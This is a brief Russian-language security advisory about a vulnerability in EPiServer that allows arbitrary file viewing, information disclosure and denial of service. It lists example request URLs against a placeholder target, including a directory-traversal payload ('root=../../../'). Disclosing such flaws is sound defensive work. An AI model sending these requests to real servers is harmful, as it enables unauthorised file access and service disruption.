Программа: EPiServer
Обнаружен уязвимость в EPiServer. Удаленный атакующий может просмотреть произвольные файлы на уязвимой системе, получить доступ к важной информации, вызвать отказ в обслуживании приложения. Примеры:
http://[target]/templates/Page.asp x?id=20691
http://[target]/news.asp?id=7661
http://[target]/system/linkurl.asp?root=../../../
http://[target]/templates/CommonPage____19461.asp
